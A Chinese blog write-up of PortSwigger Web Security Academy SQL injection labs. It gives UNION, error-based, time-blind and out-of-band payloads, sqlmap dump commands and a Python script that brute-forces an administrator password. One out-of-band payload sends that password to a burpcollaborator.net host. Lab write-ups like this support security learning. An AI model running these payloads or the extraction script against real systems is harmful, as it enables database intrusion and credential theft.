Portswigger labs - Sql Injection

最新推荐文章于 2024-08-14 15:00:00 发布
最新推荐文章于 2024-08-14 15:00:00 发布
阅读量76 收藏
点赞数
分类专栏: web安全 文章标签: web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ericalezl/article/details/132630204
版权

lab1

girf’ or 1=1–+

lab2

admin’+or 1=1–+ 万能密码登录

lab3

GET /filter?category=Corporate+gifts’+UNION+SELECT+NULL,NULL+FROM+DUAL–HTTP/2

SELECT version FROM v$instance只返回版本号
SELECT banner FROM v$version,返回所请求的完整版本字符串。

lab4

GET /filter?category=Gifts’+UNION+SELECT+‘abc’,@@version# HTTP/2

select * from v$version

lab5

union+select+table_name,null+from+information_schema.tables--+

在这里插入图片描述

union+select+column_name,null+from+information_schema.columns+where+table_name='users_pohpev'--+

在这里插入图片描述

union+select+username_kjvmus,password_sasxqt+from+users_pohpev--+

在这里插入图片描述
登录即可
在这里插入图片描述

lab6

-1'+union+select+'a','b'+from+dual--+
-1'+union+select+table_name,'b'+from+all_tables--+  所有数据库中的表名

在这里插入图片描述

-1'+union+select+column_name,'b'+from+all_tab_columns+where+table_name='USERS_UAZUWQ'--+

在这里插入图片描述

-1'+union+select+USERNAME_PFKISR,PASSWORD_SPTVBT+from+USERS_UAZUWQ--+

在这里插入图片描述

lab7

-Gifts'+union+select+1,null,null--+

lab8

提示找到一个字段包含’wBC2wi’
经过测试,在2的位置放置字符串

-Lifestyle'+union+select+1,'wBC2wi',null--+

在这里插入图片描述

lab9

-Gifts'+union+select+table_name,null+from+information_schema.tables--+
-Gifts'+union+select+column_name,null+from+information_schema.columns+where+table_name='users'--+
#此关有两个显示位,1,2,经过测试,放在2的位置不成功,放在1的位置可以

在这里插入图片描述

-Gifts'+union+select+username,password+from+users--+

在这里插入图片描述

lab10

-Pets'+union+select+null,table_name+from+information_schema.tables--+

在这里插入图片描述

-Pets'+union+select+null,column_name+from+information_schema.columns+where+table_name='users'--+

在这里插入图片描述

-Pets'+union+select+null,username||'~'||password+from+users--+

在这里插入图片描述

lab11

sqlmap -u "https://0a45008e03f375b780de4e5700250052.web-security-academy.net/filter?category=Gifts" --cookie="TrackingId=4YfDIEEQzb8ONICd" -p "TrackingId" --level 3 -T users --columns
sqlmap -u "https://0a45008e03f375b780de4e5700250052.web-security-academy.net/filter?category=Gifts" --cookie="TrackingId=4YfDIEEQzb8ONICd" -p "TrackingId" --level 3 -T users -C username,password --dump

盲注用sqlmap

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

lab12

sqlmap -u "https://0a92008a03eaaa32802c6294002c00d7.web-security-academy.net/filter?category=Lifestyle" --cookie="TrackingId=Q3Ng4ep9s0d8oT7l" -p "TrackingId" --level 3 -T users --dump

在这里插入图片描述

lab13

'+AND+1%3dCAST((SELECT+username+FROM+users+LIMIT+1)+AS+int)--+

在这里插入图片描述
在这里插入图片描述

lab14

在这里插入图片描述
'||+pg_sleep(10)-- 延时10秒

lab15

在TrackingId参数位置

x'%3bselect+case+when+(1=1)+then+pg_sleep(3)+else+pg_sleep(0)+end--  
%3b是;
x'%3bselect+case+when+(1=2)+then+pg_sleep(3)+else+pg_sleep(0)+end--  
1=2时没有延时,存在时间盲注

判断用户名是否administrator

x'%3bselect+case+when+(username='administrator'+and+length(password)>1)+then+pg_sleep(3)+else+pg_sleep(0)+end+from+users--

确定密码长度为20位

x'%3bselect+case+when+(username='administrator'+and+length(password)=20)+then+pg_sleep(3)+else+pg_sleep(0)+end+from+users--; session=j8O0Ct59oPsLampGr3alDnDXp38fISe8

因为此关延时成功和不延时的场景回显数据包长度都是5335,没办法根据burp去爆破
使用python脚本去爆破

import requests
import time

lists = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',0,1,2,3,4,5,6,7,8,9]
for p in range(21):
    for i in lists:
        url = 'https://0a5700cf0388d3dd81e9de2300260078.web-security-academy.net/filter?category=Gifts'
        cookie = {
            'TrackingId': f"x'%3bselect+case+when+(username='administrator'+and+substring(password,{p},1)=\'{i}\')+then+pg_sleep(5)+else+pg_sleep(0)+end+from+users--"}
    # 输出响应内容

        start_time = time.time()
        response = requests.get(url, cookies=cookie)
        end_time = time.time()
        delay = end_time - start_time
        if delay >=4:
            print(f"{i}")

得到密码:nb8n6ob1oodp1rtho04k

lab16

点击复制到剪贴板:vgfhr4me01jj0mmvfk7ls924bvhn5ft4
在这里插入图片描述

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//vgfhr4me01jj0mmvfk7ls924bvhn5ft4.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

在这里插入图片描述

lab17

复制到剪贴板
在这里插入图片描述

payload放到下面payload中

x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.lti74uz4drw9dczlsakb5zfuoludi66v.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

在这里插入图片描述

lab18

在这里插入图片描述
查询库存抓包
将1 union select null 编码
安装hackvertor插件
选中语句右键扩展hackvertor编码hex-entities

在这里插入图片描述

在这里插入图片描述

是字符型
1 union select username ||‘~’|| password from users

在这里插入图片描述

_WHOAM1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Find-Sec-Bugs 漏洞范例
zhaohonghan的博客
04-03 1万+
Find-Sec-Bugs 漏洞范例 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
【送书活动第2期】打靶Portswigger系列—— 一口气通关18个SQL注入靶场详细流程(文末送书)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-22 1231
BurpSuite自带就有靶场,而BP又是全球最牛的渗透工具之一,是国外专业安全团队长期维护的项目,所以安全学院做得非常不错,里面的靶场(安全实验室Libs)包含了几乎所有常见的Web漏洞,在2024年的今天,我是十分推荐大家去使用的!!
portswigger靶场之sql注入(一)
wzhwzh123321的博客
01-26 382
portswigger靶场之sql注入
burp靶场sql注入通关—上
Zqinglele的博客
04-30 1067
'+union+select+'abc','def'+from+dual-- 没有报错说明两列都是字符型。1.这关要确定该表的名称及其包含的列,然后检索表的内容以获取所有用户的用户名和密码,并以管理员用户身份登录。'+union+select+'abc','def'-- 不报错,说明有两列。'+union+select+'abc','def'%23 不报错。'+union+select+'abc','def','ghi'%23 报错。
BURP_SQL 靶场
qq_52579508的博客
07-17 447
::info:::点击 view details在6 后面添加一个 ’提示产品ID 无效 那就是不存在 了那就是应该不存在sql注入了 (经过测试的 也不是数字型sql注入 )返回再找一下是否存在其他sql注入点点击蓝色字体 ,可以跳转到其他页面输入一个 单引号就会报五百的服务器错误 ,可能存在sql 注入使用最常用的OR 永恒为真 去测试一下’ or 1=1 –显示是完成了任务 ,证明存在sql注入了。
burpsuite靶场SQL注入总结
向阳-Y.的博客
03-28 6252
burpsuite靶场SQl注入笔记~
SQL注入
weixin_58954236的博客
08-27 192
vulhub靶场的使用:在官网中找路径,在kali中打开docker-compose.yml是docker镜像虚拟机的配置文件 ,开启靶场当开启靶场的时候会自动读取yml文件,启动虚拟机。浏览器访问虚拟机的IP和镜像的端口。poc(proof of concept):概念验证exp(exploit):漏洞利用工具有一些漏洞会和一些使用的工具之间存在端口冲突。
Pentest-bookmarks v1.5
weixin_33832340的博客
10-22 655
2019独角兽企业重金招聘Python工程师标准>>> ...
pentest-bookmarks
weixin_34268610的博客
11-07 358
Blogs Worth It: What the title says. There are a LOT of pentesting blogs, these are the ones i monitor constantly and value in the actual day to day testing work. http://...
Python-一个基于burp的反射型xss检测插件
08-12
Burp Suite是一款强大的网络安全套件,由PortSwigger公司开发,主要用于Web应用的安全测试。它包括许多模块,如拦截代理、扫描器、断点调试等,是渗透测试人员的常用工具。反射型跨站脚本(Reflected XSS)是Web应用...
基于深度学习的sql注入检测系统`内训练模型和推理脚本和环境搭建教程.zip
11-01
基于深度学习的sql注入检测系统`内训练模型和推理脚本和环境搭建教程 #### 有用的设置信息 (1) 每个应用程序都作为 WAR 文件分发在`/SUT/*.war`中; (2) 应用程序的数据库位于WAR 文件中。您可以在加载 SUT 后使用...
Cyber-Security-Resources
05-23
Portswingers研究学院: ://portswigger.net/web-security Bugcrowd的Github: : Nahamsec的资源: : Nahamsec撰写的《小事》: ://docs.google....
attack-hub:攻击中心
04-04
0x00 本人用过的较好的web安全学习资源: https://portswigger.net/web-security (包含原理讲解和动手实验,原理讲解的很清楚,免费) https://www.w3schools.com/ (包含知识点讲解和动手实验,知识点讲解的很...
软设之网络安全控制
2301_81968528的博客
08-08 377
漏洞检测和安全风险评估技术,可预知主体受攻击的可能性和具体指证将要发生的行为和产生的后果。网络漏洞扫描技术主要包括网络模拟攻击,漏洞检测,报告服务进程,提取对象信息以及测评风险,提供安全建议和改进等功能,帮助用户控制可能发生的安全事件,最大可能消除安全隐患。IDS设备对于网络中的入侵行为往往是采用将入侵行为计入日志,并向网络管理员发出报警的方式来处理的,对于入侵行为并未主动的采取对应措施,响应方式单一。防火墙的作用是防止不希望的,未经授权的通信进出被保护的内部网络,通过边界控制强化内部网络的安全策略。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-14 1390
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全风险扫描原理及工具使用
qyq88888的专栏
08-08 971
通过一定的技术手段发现系统和软件存在的安全漏洞、弱口令。
网络安全(黑客)——自学2024
2401_84466325的博客
08-14 998
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
portswigger Authentication
07-28
PortSwigger是一家网络安全公司,他们开发了一款名为Burp Suite的强大的网络安全测试工具。在Burp Suite中,有一个功能模块是用于进行身份验证测试的,即Authentication模块。这个模块可以帮助安全专业人员测试应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值